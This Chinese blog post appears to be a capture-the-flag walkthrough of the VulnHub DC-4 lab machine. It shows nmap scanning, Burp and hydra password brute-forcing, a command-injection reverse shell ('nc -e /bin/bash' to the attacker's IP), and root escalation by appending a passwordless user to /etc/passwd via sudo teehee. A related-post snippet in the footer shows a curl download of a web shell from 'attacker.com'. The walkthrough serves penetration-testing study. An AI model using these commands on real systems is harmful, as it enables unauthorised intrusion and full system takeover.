DC-4 打靶渗透

于 2024-08-09 15:24:24 发布
阅读量462 收藏 9
点赞数 8
文章标签: 网络 linux 运维 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/141060024
版权

一、信息收集

1、查看靶机MAC地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.161

4、访问靶机的80端口:

5、扫描目录:

dirsearch -u "http://192.168.13.161"

6、拼接访问之后发现没有对登录框有用的信息,返回登录框进行测试,发现不存在sql注入,使用弱口令进行尝试,发现账号是admin,密码没有试出来,使用burp进行爆破:

账号密码:admin:happy

成功登录

7、登录 之后,发现有回显,bp抓包进行查看可以执行相关命令:

8、使用bp进行抓包,修改命令为反弹shell的语句:

nc+-e+/bin/bash+192.168.13.128+5555

9、kali开启监听:

10、查看是否反弹到,成功反弹但是用户权限不高:

11、使用命令获得交互式shell:

python -c 'import pty; pty.spawn("/bin/bash")'

二、提权

1、查看用户是否有sudo权限,发现需要输入密码,我们没有密码看不了:

2、查看一下有什么用户可以登录:

root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

3、有四个用户,分别查看一下目录,发现在jim目录里面有一个.bak文件:

ls /home/jim
ls /home/sam
ls /home/charles

4、查看这个文件,发现是一个密码文件,将它复制到本地:

5、尝试进行ssh爆破用户jim的密码:

hydra -l jim -P /home/kali/passwd.txt ssh://192.168.13.161

得到 jim 账户的密码为 jibril04

6、使用账号密码进行ssh连接:

7、查看这个账户的sudo权限,也没有sudo -l权限:

8、查看 mbox 的内容:

9、查看是一份邮件,由root用户发送给jim的一个邮件,则切换邮件存储路径即 /var/mail 路径下,可以看到存在 www-data 和 jim 两个文件:

10、先查看 jim 文件的内容,www-data只有www-data用户可以访问:

11、发现了账号和密码,切换一下:

账号和密码:charles:^xHhA&hvim0y

12、发现这个用户有sudo权限:

13、创建一个用户,使用teehee追加到/etc/passwd 中:

echo "IAMROOT::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
su IAMROOT

14、查看flag.txt:

搬砖小星
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub靶机 DC-5 打靶 渗透测试详细过程
rumil的博客
04-18 1058
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 956
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
VulnHub靶机 DC-8 打靶实战 详细渗透过程
rumil的博客
04-24 1403
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 1065
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
DC-5靶机详细渗透流程
braty_的博客
01-27 2006
DC-5靶机渗透详细流程
DC-3靶场渗透
一纸荒芜的博客
12-12 3441
DC3靶场打靶记录!
打靶记录】DC-6打靶记录
Yun_jj的博客
08-04 77
通过DC-6靶机,了解渗透的过程,熟悉了burpsuite,wpscan,dirsearch,nmap等工具的使用,进一步理解了命令注入漏洞的原理以及利用方式
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1496
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1141
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
dc-vue:基于VueCli4.xx和DC-SDK构建的三维应用脚手架,用于开发三维WebGis项目
02-14
"dc-vue"是一个专为开发三维WebGIS项目的脚手架,它基于Vue CLI 4.x版本,并集成了DC-SDK。这个框架的目的是简化和加速开发者构建WebGIS应用程序的过程,使得用户能够更加高效地创建复杂的3D地理信息系统。 Vue CLI...
DC-DC PCB layout 指导.docx
06-18
4. 使用铺铜的方式走线,可以减少阻抗和寄生电感,提高 DC-DC 的性能。 5. 单点接地单点接地,指的是信号地和功率地进行单点接地,功率地上会有比较大的开关噪声,因此需要尽量避免对敏感小信号造成干扰。 6. 在...
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 506
使用TCP协议支持与多个客户端同时通信。
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 212
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全
网络药理学:autodock tool(mgltools)实现大分子蛋白(PDB ID已知)和小分子配体的分子快速实践流程总结
最新发布
zhiaidaidai的博客
08-08 101
这里是快速实践的流程总结版(正文步骤都需要在中进行)。pocasaPDB。
【haproxy】haproxy基本配置信息
m0_64570996的博客
08-08 812
就是通过发布三层的IP地址(MIP),然后加四层的端口号,来决定哪些流量需要做负载均衡,对需要处理的流量进行NAT处理,转发至后台服务器,并记录下这个TCP或者UDP的流量是由哪台服务器处理的,后续这个连接的所有流量都同样转发到同一台服务器处理。所谓的四到七层负载均衡,就是在对后台的服务器进行负载均衡时,依据四层的信息或七层的信息来决定怎么样转发流量。Webserver1---172.25.254.10--下载ngnix!Webserver2---172.25.254.20--下载ngnix!
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值